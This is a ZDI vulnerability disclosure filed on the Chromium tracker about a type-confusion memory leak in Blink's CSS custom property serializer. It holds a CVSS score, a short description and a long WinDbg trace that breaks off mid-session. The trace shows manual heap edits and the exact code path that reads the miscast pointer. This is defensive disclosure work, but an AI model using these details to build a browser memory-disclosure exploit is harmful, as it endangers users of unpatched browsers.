Security: Type confusion in StylePropertySerializer::getCustomPropertyText.
Reported by zdi-disc...@hp.com, Jun 22 2016
ZDI-CAN-3840: Google Chrome StylePropertySerializer Type Confusion Information Disclosure Vulnerability

-- CVSS -----------------------------------------
4.3, AV:N/AC:M/Au:N/C:P/I:N/A:N

-- ABSTRACT -------------------------------------
Trend Micro's Zero Day Initiative has identified a vulnerability affecting the following products:
Google Chrome

-- VULNERABILITY DETAILS ------------------------
* Version tested: Chromium for Windows 64-bit (commit 42b7246433e2b79901292d2bc97dc6607530fac2)
* Platform tested: Windows 10 Enterprise 1511 64-bit

Type confusion in StylePropertySerializer::getCustomPropertyText.

StylePropertySerializer::getCustomPropertyText has a pointer to a CSSVariableReferenceValue and improperly casts it to `CSSCustomPropertyDeclaration*`. Consequently, CSSCustomPropertyDeclaration.name takes a pointer to a CSSVariableData object and uses it as an `AtomicString*`. The end result is that some memory contents are disclosed to the calling script. Some memory preparation is needed to ensure that only valid memory is read so that the process does not crash, but this appears quite feasible.

Running the attached PoC on either the Debug or Release build of Chromium without a debugger attached results in an "Aw Snap".

Debug log (from release build)

```
************* Symbol Path validation summary **************
Response                         Time (ms)     Location
Deferred                                       symsrv*symsrv.dll*c:\symbols*http://msdl.microsoft.com/download/symbols
************* Symbol Path validation summary **************
Response                         Time (ms)     Location
OK                                             C:\chromium\src
OK                                             C:\chromium\src\third_party\WebKit\Source\core\css\parser
OK                                             C:\chromium\src\third_party\WebKit\Source\core\css

Microsoft (R) Windows Debugger Version 10.0.10586.567 AMD64
Copyright (c) Microsoft Corporation. All rights reserved.

*** wait with pending attach
************* Symbol Path validation summary **************
Response                         Time (ms)     Location
Deferred                                       symsrv*symsrv.dll*c:\symbols*http://msdl.microsoft.com/download/symbols
Symbol search path is: symsrv*symsrv.dll*c:\symbols*http://msdl.microsoft.com/download/symbols
Executable search path is:
ModLoad: 00007ff6`a29a0000 00007ff6`a37a6000   C:\chromium\src\out\Release1\chrome.exe
ModLoad: 00007ffe`0b350000 00007ffe`0b511000   C:\Windows\SYSTEM32\ntdll.dll
ModLoad: 00007ffe`08a20000 00007ffe`08acd000   C:\Windows\system32\KERNEL32.DLL
ModLoad: 00007ffe`08430000 00007ffe`08618000   C:\Windows\system32\KERNELBASE.dll
ModLoad: 00007ffe`0b020000 00007ffe`0b0c7000   C:\Windows\system32\ADVAPI32.dll
ModLoad: 00007ffe`0a0d0000 00007ffe`0a16d000   C:\Windows\system32\msvcrt.dll
ModLoad: 00007ffe`0a3b0000 00007ffe`0a40b000   C:\Windows\system32\sechost.dll
ModLoad: 00007ffe`08900000 00007ffe`08a1c000   C:\Windows\system32\RPCRT4.dll
ModLoad: 00007ffe`0a220000 00007ffe`0a3a6000   C:\Windows\system32\GDI32.dll
ModLoad: 00007ffe`0a8a0000 00007ffe`0a9f6000   C:\Windows\system32\USER32.dll
ModLoad: 00007ffe`0a890000 00007ffe`0a898000   C:\Windows\system32\PSAPI.DLL
ModLoad: 00007ffe`08ad0000 00007ffe`0a02c000   C:\Windows\system32\SHELL32.dll
ModLoad: 00007ffe`08350000 00007ffe`08393000   C:\Windows\system32\cfgmgr32.dll
ModLoad: 00007ffe`07d00000 00007ffe`08344000   C:\Windows\system32\windows.storage.dll
ModLoad: 00007ffe`0a5e0000 00007ffe`0a85d000   C:\Windows\system32\combase.dll
ModLoad: 00007ffe`08620000 00007ffe`0868a000   C:\Windows\system32\bcryptPrimitives.dll
ModLoad: 00007ffe`0a030000 00007ffe`0a082000   C:\Windows\system32\shlwapi.dll
ModLoad: 00007ffe`07980000 00007ffe`0798f000   C:\Windows\system32\kernel.appcore.dll
ModLoad: 00007ffe`08690000 00007ffe`08745000   C:\Windows\system32\shcore.dll
ModLoad: 00007ffe`07990000 00007ffe`079db000   C:\Windows\system32\powrprof.dll
ModLoad: 00007ffe`079e0000 00007ffe`079f4000   C:\Windows\system32\profapi.dll
ModLoad: 00007ffe`0afb0000 00007ffe`0b01b000   C:\Windows\system32\WS2_32.dll
ModLoad: 00007ffe`07b10000 00007ffe`07b27000   C:\Windows\system32\NETAPI32.dll
ModLoad: 00007ffe`07b30000 00007ffe`07cf8000   C:\Windows\system32\CRYPT32.dll
ModLoad: 00007ffe`07970000 00007ffe`07980000   C:\Windows\system32\MSASN1.dll
ModLoad: 00007ffd`f9870000 00007ffd`f9927000   C:\chromium\src\out\Release1\chrome_elf.dll
ModLoad: 00007ffe`04a70000 00007ffe`04a88000   C:\Windows\SYSTEM32\USP10.dll
ModLoad: 00007ffd`fec20000 00007ffd`fec2a000   C:\Windows\SYSTEM32\VERSION.dll
ModLoad: 00007ffd`f9cb0000 00007ffd`f9f59000   C:\Windows\SYSTEM32\WININET.dll
ModLoad: 00007ffe`06070000 00007ffe`06093000   C:\Windows\SYSTEM32\WINMM.dll
ModLoad: 00007ffe`070d0000 00007ffe`070ef000   C:\Windows\SYSTEM32\USERENV.dll
ModLoad: 00007ffe`057e0000 00007ffe`057f3000   C:\Windows\SYSTEM32\WTSAPI32.dll
ModLoad: 00007ffd`fbb00000 00007ffd`fbcb7000   C:\Windows\SYSTEM32\urlmon.dll
ModLoad: 00007ffe`040b0000 00007ffe`04178000   C:\Windows\SYSTEM32\WINHTTP.dll
ModLoad: 00007ffe`01bf0000 00007ffe`01c0a000   C:\Windows\SYSTEM32\dhcpcsvc.DLL
ModLoad: 00007ffe`0a880000 00007ffe`0a888000   C:\Windows\system32\NSI.dll
ModLoad: 00007ffe`04250000 00007ffe`04288000   C:\Windows\SYSTEM32\IPHLPAPI.DLL
ModLoad: 00007ffe`040a0000 00007ffe`040ac000   C:\Windows\SYSTEM32\Secur32.dll
ModLoad: 00007ffe`06010000 00007ffe`0603c000   C:\Windows\SYSTEM32\WINMMBASE.dll
ModLoad: 00007ffd`ff3c0000 00007ffd`ff743000   C:\Windows\SYSTEM32\iertutil.dll
ModLoad: 00007ffe`07890000 00007ffe`0789b000   C:\Windows\SYSTEM32\CRYPTBASE.DLL
ModLoad: 00007ffe`06d80000 00007ffe`06d8c000   C:\Windows\SYSTEM32\NETUTILS.DLL
ModLoad: 00007ffe`03710000 00007ffe`03726000   C:\Windows\SYSTEM32\WKSCLI.DLL
ModLoad: 00007ffe`078a0000 00007ffe`078c9000   C:\Windows\SYSTEM32\bcrypt.dll
ModLoad: 00007ffe`075e0000 00007ffe`0760d000   C:\Windows\SYSTEM32\SSPICLI.DLL
ModLoad: 00007ffe`0a090000 00007ffe`0a0cb000   C:\Windows\system32\IMM32.DLL
ModLoad: 00007ffd`e12e0000 00007ffd`e62ad000   C:\chromium\src\out\Release1\chrome_child.dll
ModLoad: 00007ffe`0aa00000 00007ffe`0ab0b000   C:\Windows\system32\COMDLG32.dll
ModLoad: 00007ffe`083a0000 00007ffe`08426000   C:\Windows\system32\FirewallAPI.dll
ModLoad: 00007ffe`08750000 00007ffe`08893000   C:\Windows\system32\ole32.dll
ModLoad: 00007ffe`0b280000 00007ffe`0b341000   C:\Windows\system32\OLEAUT32.dll
ModLoad: 00007ffe`07a00000 00007ffe`07a55000   C:\Windows\system32\WINTRUST.dll
ModLoad: 00007ffd`f9020000 00007ffd`f9294000   C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\COMCTL32.dll
ModLoad: 00007ffe`02cf0000 00007ffe`02d74000   C:\Windows\SYSTEM32\WINSPOOL.DRV
ModLoad: 00007ffd`f8970000 00007ffd`f89da000   C:\Windows\SYSTEM32\OLEACC.dll
ModLoad: 00007ffe`01460000 00007ffe`01488000   C:\Windows\SYSTEM32\NTDSAPI.dll
ModLoad: 00007ffe`03b80000 00007ffe`03d0c000   C:\Windows\SYSTEM32\dbghelp.dll
ModLoad: 00007ffd`f87b0000 00007ffd`f87bc000   C:\Windows\SYSTEM32\DAVHLPR.DLL
ModLoad: 00007ffe`066f0000 00007ffe`06722000   C:\Windows\system32\fwbase.dll
ModLoad: 00007ffd`fdae0000 00007ffd`fdd40000   C:\Windows\SYSTEM32\dwrite.dll
(d78.6f4): Break instruction exception - code 80000003 (first chance)
ntdll!DbgBreakPoint:
00007ffe`0b3f8870 cc              int     3
0:009> bp @@masm(`chrome_child!CSSPropertyParser.cpp:172+`) 4;
*** WARNING: Unable to verify checksum for C:\chromium\src\out\Release1\chrome_child.dll
0:009> bp @@masm(`chrome_child!StylePropertySerializer.cpp:184+`);
0:009> g
Breakpoint 0 hit
chrome_child!blink::CSSPropertyParser::parseValueStart+0x57:
00007ffd`e3b20b8f 803d86951c0200  cmp     byte ptr [chrome_child!blink::RuntimeEnabledFeatures::isCSSVariablesEnabled (00007ffd`e5cea11c)],0 ds:00007ffd`e5cea11c=01
0:000> k
 # Child-SP          RetAddr           Call Site
00 00000012`f836aca0 00007ffd`e3b20b18 chrome_child!blink::CSSPropertyParser::parseValueStart+0x57 [c:\chromium\src\third_party\webkit\source\core\css\parser\csspropertyparser.cpp @ 173]
01 00000012`f836ad00 00007ffd`e3b0bc10 chrome_child!blink::CSSPropertyParser::parseValue+0xf0 [c:\chromium\src\third_party\webkit\source\core\css\parser\csspropertyparser.cpp @ 121]
02 00000012`f836ad60 00007ffd`e3b0edbd chrome_child!blink::CSSParserImpl::consumeDeclarationValue+0x2c [c:\chromium\src\third_party\webkit\source\core\css\parser\cssparserimpl.cpp @ 804]
03 00000012`f836ada0 00007ffd`e3b075f8 chrome_child!blink::CSSParserImpl::parseValue+0xb1 [c:\chromium\src\third_party\webkit\source\core\css\parser\cssparserimpl.cpp @ 50]
04 (Inline Function) --------`-------- chrome_child!blink::CSSParser::parseValue+0x1a [c:\chromium\src\third_party\webkit\source\core\css\parser\cssparser.cpp @ 99]
05 00000012`f836be80 00007ffd`e3b532e4 chrome_child!blink::CSSParser::parseValue+0xd8 [c:\chromium\src\third_party\webkit\source\core\css\parser\cssparser.cpp @ 75]
06 00000012`f836bf80 00007ffd`e3b52f6c chrome_child!blink::EditingStyle::mergeStyle+0x368 [c:\chromium\src\third_party\webkit\source\core\editing\editingstyle.cpp @ 1184]
07 00000012`f836c010 00007ffd`e3b85358 chrome_child!blink::EditingStyle::mergeInlineStyleOfElement+0x88 [c:\chromium\src\third_party\webkit\source\core\editing\editingstyle.cpp @ 1058]
08 00000012`f836c040 00007ffd`e3b8807c chrome_child!blink::ApplyStyleCommand::applyInlineStyleToPushDown+0xc0 [c:\chromium\src\third_party\webkit\source\core\editing\commands\applystylecommand.cpp @ 1119]
09 00000012`f836c0a0 00007ffd`e3b840b0 chrome_child!blink::ApplyStyleCommand::removeInlineStyle+0x350 [c:\chromium\src\third_party\webkit\source\core\editing\commands\applystylecommand.cpp @ 1283]
0a 00000012`f836c2a0 00007ffd`e3b85e8b chrome_child!blink::ApplyStyleCommand::applyInlineStyle+0x3cc [c:\chromium\src\third_party\webkit\source\core\editing\commands\applystylecommand.cpp @ 681]
0b 00000012`f836c3d0 00007ffd`e3b8a47c chrome_child!blink::ApplyStyleCommand::doApply+0xb7 [c:\chromium\src\third_party\webkit\source\core\editing\commands\applystylecommand.cpp @ 236]
0c 00000012`f836c400 00007ffd`e3b9d51b chrome_child!blink::CompositeEditCommand::applyCommandToComposite+0x34 [c:\chromium\src\third_party\webkit\source\core\editing\commands\compositeeditcommand.cpp @ 255]
0d 00000012`f836c430 00007ffd`e3b8a345 chrome_child!blink::RemoveFormatCommand::doApply+0xd7 [c:\chromium\src\third_party\webkit\source\core\editing\commands\removeformatcommand.cpp @ 97]
0e 00000012`f836c470 00007ffd`e3b5e066 chrome_child!blink::CompositeEditCommand::apply+0x89 [c:\chromium\src\third_party\webkit\source\core\editing\commands\compositeeditcommand.cpp @ 209]
0f 00000012`f836c4a0 00007ffd`e3b951ec chrome_child!blink::Editor::removeFormattingAndStyle+0x42 [c:\chromium\src\third_party\webkit\source\core\editing\editor.cpp @ 579]
10 00000012`f836c4d0 00007ffd`e3b932b9 chrome_child!blink::executeRemoveFormat+0x10 [c:\chromium\src\third_party\webkit\source\core\editing\commands\editorcommand.cpp @ 1104]
11 00000012`f836c500 00007ffd`e38c07c2 chrome_child!blink::Editor::Command::execute+0x189 [c:\chromium\src\third_party\webkit\source\core\editing\commands\editorcommand.cpp @ 1811]
12 00000012`f836c550 00007ffd`e37b8766 chrome_child!blink::Document::execCommand+0x18a [c:\chromium\src\third_party\webkit\source\core\dom\document.cpp @ 4468]
13 00000012`f836c5b0 00007ffd`e24a7041 chrome_child!blink::DocumentV8Internal::execCommandMethod+0x2da [c:\chromium\src\out\release1\gen\blink\bindings\core\v8\v8document.cpp @ 4162]
14 00000012`f836c690 00007ffd`e252937b chrome_child!v8::internal::FunctionCallbackArguments::Call+0x151 [c:\chromium\src\v8\src\api-arguments.cc @ 20]
15 00000012`f836c760 00007ffd`e2512e82 chrome_child!v8::internal::`anonymous namespace'::HandleApiCallHelper+0x4cb [c:\chromium\src\v8\src\builtins.cc @ 4961]
16 00000012`f836c890 00007ffd`e25067ab chrome_child!v8::internal::Builtin_Impl_HandleApiCall+0x42 [c:\chromium\src\v8\src\builtins.cc @ 4977]
17 00000012`f836c8d0 00000378`41b063cb chrome_child!v8::internal::Builtin_HandleApiCall+0x3b [c:\chromium\src\v8\src\builtins.cc @ 4975]
18 00000012`f836c910 00000012`f836c968 0x00000378`41b063cb
19 00000012`f836c918 00000378`41b063cb 0x00000012`f836c968
1a 00000012`f836c920 00007ffd`e27c292f 0x00000378`41b063cb
1b 00000012`f836c928 00000378`41b70aa9 chrome_child!v8::internal::Runtime_LoadElementWithInterceptor+0x22f
1c 00000012`f836c930 000002cc`16b176e9 0x00000378`41b70aa9
1d 00000012`f836c938 000001cf`740eead0 0x000002cc`16b176e9
1e 00000012`f836c940 00000378`41b06301 0x000001cf`740eead0
1f 00000012`f836c948 00000012`f836c910 0x00000378`41b06301
20 00000012`f836c950 00000003`00000000 0x00000012`f836c910
21 00000012`f836c958 00000012`f836c9b8 0x00000003`00000000
22 00000012`f836c960 00000378`41b70ae9 0x00000012`f836c9b8
23 00000012`f836c968 000000e9`fd704311 0x00000378`41b70ae9
24 00000012`f836c970 000002dd`665185c9 0x000000e9`fd704311
25 00000012`f836c978 000000e9`fd704411 0x000002dd`665185c9
26 00000012`f836c980 000000e9`fd704411 0x000000e9`fd704411
27 00000012`f836c988 000002dd`66550321 0x000000e9`fd704411
28 00000012`f836c990 00000182`aa205af9 0x000002dd`66550321
29 00000012`f836c998 000002dd`665185c9 0x00000182`aa205af9
2a 00000012`f836c9a0 000000e9`fd704311 0x000002dd`665185c9
2b 00000012`f836c9a8 000002dd`665506b9 0x000000e9`fd704311
2c 00000012`f836c9b0 000000e9`fd7ba631 0x000002dd`665506b9
2d 00000012`f836c9b8 00000012`f836c9e8 0x000000e9`fd7ba631
2e 00000012`f836c9c0 00000378`41b42b64 0x00000012`f836c9e8
2f 00000012`f836c9c8 00000182`aa205b49 0x00000378`41b42b64
30 00000012`f836c9d0 000002dd`665506b9 0x00000182`aa205b49
31 00000012`f836c9d8 00000378`41b42a81 0x000002dd`665506b9
32 00000012`f836c9e0 0000000c`00000000 0x00000378`41b42a81
33 00000012`f836c9e8 00000012`f836cb00 0x0000000c`00000000
34 00000012`f836c9f0 00000378`41b27003 0x00000012`f836cb00
35 00000012`f836c9f8 00000000`00000000 0x00000378`41b27003
0:000> tct
chrome_child!blink::CSSPropertyParser::parseValueStart+0x74:
00007ffd`e3b20bac e8af7b0000      call    chrome_child!blink::CSSVariableParser::containsValidVariableReferences (00007ffd`e3b28760)
0:000> p
chrome_child!blink::CSSPropertyParser::parseValueStart+0x79:
00007ffd`e3b20bb1 84c0            test    al,al
0:000> tct
chrome_child!blink::CSSVariableData::operator new+0xc [inlined in chrome_child!blink::CSSPropertyParser::parseValueStart+0x89]:
00007ffd`e3b20bc1 e8c6bd6dfe      call    chrome_child!WTF::Partitions::fastMalloc (00007ffd`e21fc98c)
0:000> r
rax=0000000000000201 rbx=00000012f836ad20 rcx=0000000000000038
rdx=00007ffde5770480 rsi=0000000000000002 rdi=0000000000000002
rip=00007ffde3b20bc1 rsp=00000012f836aca0 rbp=00000012f836ae00
 r8=00007ffde5e94888  r9=00000012f836aa01 r10=00007ffde56dc650
r11=0000000000000001 r12=0000000000000001 r13=00000350846c92a0
r14=00000012f836ae18 r15=0000000000000000
iopl=0         nv up ei pl nz na pe nc
cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202
chrome_child!blink::CSSVariableData::operator new+0xc [inlined in chrome_child!blink::CSSPropertyParser::parseValueStart+0x89]:
00007ffd`e3b20bc1 e8c6bd6dfe      call    chrome_child!WTF::Partitions::fastMalloc (00007ffd`e21fc98c)
0:000> p
chrome_child!blink::CSSVariableData::create+0x11 [inlined in chrome_child!blink::CSSPropertyParser::parseValueStart+0x8e]:
00007ffd`e3b20bc6 4885c0          test    rax,rax
0:000> ?@rax
Evaluate expression: 2472915841448 = 0000023f`c54531a8
0:000> ed @rax+4 20
0:000> g
Breakpoint 1 hit
chrome_child!WTF::RefPtr<WTF::StringImpl>::get [inlined in chrome_child!blink::StylePropertySerializer::getCustomPropertyText+0x52]:
00007ffd`e3af62be 488b4b08        mov     rcx,qword ptr [rbx+8] ds:000003f6`9bc83a80=0000023fc54531a8
0:000> k
 # Child-SP          RetAddr           Call Site
00 (Inline Function) --------`-------- chrome_child!WTF::RefPtr<WTF::StringImpl>::get
01 (Inline Function) --------`-------- chrome_child!WTF::String::impl
02 (Inline Function) --------`-------- chrome_child!WTF::AtomicString::impl
03 (Inline Function) --------`-------- chrome_child!WTF::StringView::{ctor}
04 00000012`f836bd60 00007ffd`e3af4b8f chrome_child!blink::StylePropertySerializer::getCustomPropertyText+0x52 [c:\chromium\src\third_party\webkit\source\core\css\stylepropertyserializer.cpp @ 184]
05 00000012`f836bde0 00007ffd`e3af882f chrome_child!blink::StylePropertySerializer::asText+0x49b [c:\chromium\src\third_party\webkit\source\core\css\stylepropertyserializer.cpp @ 241]
06 00000012`f836bfb0 00007ffd`e3b853a6 chrome_child!blink::StylePropertySet::asText+0x33 [c:\chromium\src\third_party\webkit\source\core\css\stylepropertyset.cpp @ 379]
07 00000012`f836c040 00007ffd`e3b8807c chrome_child!blink::ApplyStyleCommand::applyInlineStyleToPushDown+0x10e [c:\chromium\src\third_party\webkit\source\core\editing\commands\applystylecommand.cpp @ 1120]
08 00000012`f836c0a0 00007ffd`e3b840b0 chrome_child!blink::ApplyStyleCommand::removeInlineStyle+0x350 [c:\chromium\src\third_party\webkit\source\core\editing\commands\applystylecommand.cpp @ 1283]
09 00000012`f836c2a0 00007ffd`e3b85e8b chrome_child!blink::ApplyStyleCommand::applyInlineStyle+0x3cc [c:\chromium\src\third_party\webkit\source\core\editing\commands\applystylecommand.cpp @ 681]
0a 00000012`f836c3d0 00007ffd`e3b8a47c chrome_child!blink::ApplyStyleCommand::doApply+0xb7 [c:\chromium\src\third_party\webkit\source\core\editing\commands\applystylecommand.cpp @ 236]
0b 00000012`f836c400 00007ffd`e3b9d51b chrome_child!blink::CompositeEditCommand::applyCommandToComposite+0x34 [c:\chromium\src\third_party\webkit\source\core\editing\commands\compositeeditcommand.cpp @ 255]
0c 00000012`f836c430 00007ffd`e3b8a345 chrome_child!blink::RemoveFormatCommand::doApply+0xd7 [c:\chromium\src\third_party\webkit\source\core\editing\commands\removeformatcommand.cpp @ 97]
0d 00000012`f836c470 00007ffd`e3b5e066 chrome_child!blink::CompositeEditCommand::apply+0x89 [c:\chromium\src\third_party\webkit\source\core\editing\commands\compositeeditcommand.cpp @ 209]
0e 00000012`f836c4a0 00007ffd`e3b951ec chrome_child!blink::Editor::removeFormattingAndStyle+0x42 [c:\chromium\src\third_party\webkit\source\core\editing\editor.cpp @ 579]
0f 00000012`f836c4d0 00007ffd`e3b932b9 chrome_child!blink::executeRemoveFormat+0x10 [c:\chromium\src\third_party\webkit\source\core\editing\commands\editorcommand.cpp @ 1104]
10 00000012`f836c500 00007ffd`e38c07c2 chrome_child!blink::Editor::Command::execute+0x189 [c:\chromium\src\third_party\webkit\source\core\editing\commands\editorcommand.cpp @ 1811]
11 00000012`f836c550 00007ffd`e37b8766 chrome_child!blink::Document::execCommand+0x18a [c:\chromium\src\third_party\webkit\source\core\dom\document.cpp @ 4468]
12 00000012`f836c5b0 00007ffd`e24a7041 chrome_child!blink::DocumentV8Internal::execCommandMethod+0x2da [c:\chromium\src\out\release1\gen\blink\bindings\core\v8\v8document.cpp @ 4162]
13 00000012`f836c690 00007ffd`e252937b chrome_child!v8::internal::FunctionCallbackArguments::Call+0x151 [c:\chromium\src\v8\src\api-arguments.cc @ 20]
14 00000012`f836c760 00007ffd`e2512e82 chrome_child!v8::internal::`anonymous namespace'::HandleApiCallHelper+0x4cb [c:\chromium\src\v8\src\builtins.cc @ 4961]
15 00000012`f836c890 00007ffd`e25067ab chrome_child!v8::internal::Builtin_Impl_HandleApiCall+0x42 [c:\chromium\src\v8\src\builtins.cc @ 4977]
16 00000012`f836c8d0 00000378`41b063cb chrome_child!v8::internal::Builtin_HandleApiCall+0x3b [c:\chromium\src\v8\src\builtins.cc @ 4975]
17 00000012`f836c910 00000012`f836c968 0x00000378`41b063cb
18 00000012`f836c918 00000378`41b063cb 0x00000012`f836c968
19 00000012`f836c920 00007ffd`e27c292f 0x00000378`41b063cb
1a 00000012`f836c928 00000378`41b70aa9 chrome_child!v8::internal::Runtime_LoadElementWithInterceptor+0x22f
1b 00000012`f836c930 000002cc`16b176e9 0x00000378`41b70aa9
1c 00000012`f836c938 000001cf`740eead0 0x000002cc`16b176e9
1d 00000012`f836c940 00000378`41b06301 0x000001cf`740eead0
1e 00000012`f836c948 00000012`f836c910 0x00000378`41b06301
1f 00000012`f836c950 00000003`00000000 0x00000012`f836c910
20 00000012`f836c958 00000012`f836c9b8 0x00000003`00000000
21 00000012`f836c960 00000378`41b70ae9 0x00000012`f836c9b8
22 00000012`f836c968 000000e9`fd704311 0x00000378`41b70ae9
23 00000012`f836c970 000002dd`665185c9 0x000000e9`fd704311
24 00000012`f836c978 000000e9`fd704411 0x000002dd`665185c9
25 00000012`f836c980 000000e9`fd704411 0x000000e9`fd704411
26 00000012`f836c988 000002dd`66550321 0x000000e9`fd704411
27 00000012`f836c990 00000182`aa205af9 0x000002dd`66550321
28 00000012`f836c998 000002dd`665185c9 0x00000182`aa205af9
29 00000012`f836c9a0 000000e9`fd704311 0x000002dd`665185c9
2a 00000012`f836c9a8 000002dd`665506b9 0x000000e9`fd704311
2b 00000012`f836c9b0 000000e9`fd7ba631 0x000002dd`665506b9
2c 00000012`f836c9b8 00000012`f836c9e8 0x000000e9`fd7ba631
2d 00000012`f836c9c0 00000378`41b42b64 0x00000012`f836c9e8
2e 00000012`f836c9c8 00000182`aa205b49 0x00000378`41b42b64
2f 00000012`f836c9d0 000002dd`665506b9 0x00000182`aa205b49
30 00000012`f836c9d8 00000378`41b42a81 0x000002dd`665506b9
31 00000012`f836c9e0 0000000c`00000000 0x00000378`41b42a81
32 00000012`f836c9e8 00000012`f836cb00 0x0000000c`00000000
33 00000012`f836c9f0 00000378`41b27003 0x00000012`f836cb00
34 00000012`f836c9f8 00000000`00000000 0x00000378`41b27003
0:000> ba r 1 0000023f`c54531a8+c
0:000> gu
chrome_child!WTF::StringView::{ctor} [inlined in chrome_child!blink::StylePropertySerializer::getCustomPropertyText+0x56]:
00007ffd`e3af62c2 4885c9          test    rcx,rcx
0:000> gu
chrome_child!WTF::StringView::{ctor}+0x3 [inlined in chrome_child!blink::StylePropertySerializer::getCustomPropertyText+0x59]:
00007ffd`e3af62c5 7512            jne     chrome_child!blink::StylePropertySerializer::getCustomPropertyText+0x6d (00007ffd`e3af62d9) [br=1]
0:000> gu
chrome_child!WTF::StringView::{ctor}+0x17 [inlined in chrome_child!blink::StylePropertySerializer::getCustomPropertyText+0x6d]:
00007ffd`e3af62d9 8b4104          mov     eax,dword ptr [rcx+4] ds:0000023f`c54531ac=00000020
0:000> gu
chrome_child!WTF::StringView::{ctor}+0x1a [inlined in chrome_child!blink::StylePropertySerializer::getCustomPropertyText+0x70]:
00007ffd`e3af62dc 8945d0          mov     dword ptr [rbp-30h],eax ss:00000012`f836bd90=956c66b0
0:000> gu
chrome_child!WTF::StringImpl::bytes [inlined in chrome_child!blink::StylePropertySerializer::getCustomPropertyText+0x73]:
00007ffd`e3af62df 488d410c        lea     rax,[rcx+0Ch]
0:000> gu
chrome_child!WTF::StringImpl::bytes+0x4 [inlined in chrome_child!blink::StylePropertySerializer::getCustomPropertyText+0x77]:
00007ffd`e3af62e3 488945c8        mov     qword ptr [rbp-38h],rax ss:00000012`f836bd88=00007ffde3af36a7
0:000> gu
chrome_child!WTF::StringView::{ctor}+0x25 [inlined in chrome_child!blink::StylePropertySerializer::getCustomPropertyText+0x7b]:
00007ffd`e3af62e7 48894dc0        mov     qword ptr [rbp-40h],rcx ss:00000012`f836bd80=0000000000000001
0:000> gu
chrome_child!blink::StylePropertySerializer::getCustomPropertyText+0x7f:
00007ffd`e3af62eb 488d55c0        lea     rdx,[rbp-40h]
0:000> gu
Breakpoint 2 hit
chrome_child!MoveSmall+0x20d:
00007ffd`e4e7a9e4 4883c110        add     rcx,10h
0:000> ub .
chrome_child!MoveSmall+0x1f0 [f:\dd\vctools\crt\vcruntime\src\string\amd64\memcpy.asm @ 424]:
00007ffd`e4e7a9c7 0f10440ae0      movups  xmm0,xmmword ptr [rdx+rcx-20h]
00007ffd`e4e7a9cc 0f104c0af0      movups  xmm1,xmmword ptr [rdx+rcx-10h]
00007ffd`e4e7a9d1 75ad            jne     chrome_child!MoveSmall+0x1a9 (00007ffd`e4e7a980)
00007ffd`e4e7a9d3 0f2941e0        movaps  xmmword ptr [rcx-20h],xmm0
00007ffd`e4e7a9d7 4983e07f        and     r8,7Fh
00007ffd`e4e7a9db 0f28c1          movaps  xmm0,xmm1
00007ffd`e4e7a9de eb0c            jmp     chrome_child!MoveSmall+0x215 (00007ffd`e4e7a9ec)
00007ffd`e4e7a9e0 0f10040a        movups  xmm0,xmmword ptr [rdx+rcx]
0:000> bl
 0 e 00007ffd`e3b20b8f     0001 (0004)  0:**** chrome_child!blink::CSSPropertyParser::parseValueStart+0x57
 1 e 00007ffd`e3af62be     0001 (0001)  0:**** chrome_child!blink::StylePropertySerializer::getCustomPropertyText+0x52
 2 e 0000023f`c54531b4 r 1 0001 (0001)  0:****
0:000> dq 0000023f`c54531b4
0000023f`c54531b4  9c00e500`000004f2 00000004`000004f2
0000023f`c54531c4  00000001`00000003 00000000`00000000
0000023f`c54531d4  00000000`00000000 3f020000`00000000
0000023f`c54531e4  00000000`183245c5 00000000`00000000
0000023f`c54531f4  00000000`00000000 00000000`00000000
0000023f`c5453204  00000000`00000000 00000000`00000000
0000023f`c5453214  3f020000`00000000 00000000`503245c5
0000023f`c5453224  00000000`00000000 00000000`00000000
0:000> t
chrome_child!MoveSmall+0x211:
00007ffd`e4e7a9e8 4983e810        sub     r8,10h
0:000> t
chrome_child!MoveSmall+0x215:
00007ffd`e4e7a9ec 4d8bc8          mov     r9,r8
0:000> t
chrome_child!MoveSmall+0x218:
00007ffd`e4e7a9ef 49c1e904        shr     r9,4
0:000> t
chrome_child!MoveSmall+0x21c:
00007ffd`e4e7a9f3 741c            je      chrome_child!MoveSmall+0x23a (00007ffd`e4e7aa11) [br=0]
0:000> t
chrome_child!MoveSmall+0x21e:
00007ffd`e4e7a9f5 6666660f1f840000000000 nop word ptr [rax+rax]
0:000> t
chrome_child!MoveSmall+0x229:
00007ffd`e4e7aa00 0f1141f0        movups  xmmword ptr [rcx-10h],xmm0 ds:000004f2`9c0780fe=00000000000000000000000000000000
0:000> dq 000004f2`9c0780fe
000004f2`9c0780fe  00000000`00000000 00000000`00000000
000004f2`9c07810e  00000000`00000000 00000000`00000000
000004f2`9c07811e  00000000`00000000 00000000`00000000
000004f2`9c07812e  00000000`00000000 00000000`00000000
000004f2`9c07813e  00000000`00150000 00000000`00004100
000004f2`9c07814e  00000001`00138000 00000000`00004100
000004f2`9c07815e  00000002`00148000 00000000`00004100
000004f2`9c07816e  00000003`00198000 00000000`00004100
0:000> gu
chrome_child!WTF::StringBuilder::append+0x13e:
00007ffd`e220adae 44897318        mov     dword ptr [rbx+18h],r14d ds:00000012`f836bdb0=00000001
0:000> dq 000004f2`9c0780fe
000004f2`9c0780fe  9c00e500`000004f2 00000004`000004f2
000004f2`9c07810e  00000001`00000003 00000000`00000000
000004f2`9c07811e  00000000`00000000 3f020000`00000000
000004f2`9c07812e  00000000`183245c5 00000000`00000000
000004f2`9c07813e  00000000`00150000 00000000`00004100
000004f2`9c07814e  00000001`00138000 00000000`00004100
000004f2`9c07815e  00000002`00148000 00000000`00004100
000004f2`9c07816e  00000003`00198000 00000000`00004100
0:000> eu 000004f2`9c0780fe+10 "PWNED"
0:000> bp chrome_child!blink::ChromeClient::openJavaScriptAlert
0:000> gu
chrome_child!WTF::StringBuilder::append+0x96:
00007ffd`e21fcb2a 488b5c2430      mov     rbx,qword ptr [rsp+30h] ss:00000012`f836bd60=000003f69bc83a78
0:000> gu
could step in/over inline function frames
...
03 00000012`f836bd60 00007ffd`e3af4b8f chrome_child!blink::StylePropertySerializer::getCustomPropertyText+0x8c [c:\chromium\src\third_party\webkit\source\core\css\stylepropertyserializer.cpp @ 185]
chrome_child!blink::StylePropertySerializer::getCustomPropertyText+0x8c:
00007ffd`e3af62f8 488b4de0        mov     rcx,qword ptr [rbp-20h] ss:00000012`f836bda0=000004f29c0780f0
0:000> t
chrome_child!blink::StylePropertySerializer::getCustomPropertyText+0x90:
00007ffd`e3af62fc ba3a000000      mov     edx,3Ah
0:000> t
